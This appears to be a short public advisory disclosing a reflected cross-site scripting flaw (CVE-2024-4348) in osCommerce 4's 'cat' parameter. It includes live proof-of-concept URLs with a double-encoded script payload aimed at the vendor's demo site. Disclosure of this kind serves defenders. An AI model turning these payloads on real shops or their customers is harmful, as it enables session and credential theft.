Headline
osCommerce 4 Cross Site Scripting
osCommerce version 4 suffers from a cross site scripting vulnerability. Original discovery of cross site scripting in this version is attributed to CraCkEr in November of 2023.
# Exploit Title: osCommerce 4 - Reflected XSS# Exploit Author: skalvin# Date: 22/04/2024# Vendor: osCommerce ltd.# Vendor Homepage: https://www.oscommerce.com/# Software Link: https://demo.oscommerce.com/# Demo Link: https://demo.oscommerce.com/furniture/# Tested on: Windows 11 Pro# Impact: Manipulate the content of the site# CVE: CVE-2024-4348# VDB: VDB-262488# CWE: CWE-79 / CWE-74 / CWE-707# CAPEC: CAPEC-10 / CAPEC-209 / CAPEC-250# ATT&CK: T1059.007## DescriptionAttacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsGET parameter 'cat' is vulnerable to RXSSPath: /furniture/catalog/all-productshttps://demo.oscommerce.com/furniture/catalog/all-products?cat=[XSS]https://demo.oscommerce.com/watch/catalog/all-products?cat=[XSS]## Live POC:https://demo.oscommerce.com/furniture/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253eiyehb=1https://demo.oscommerce.com/watch/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253eiyehb=1[-] Done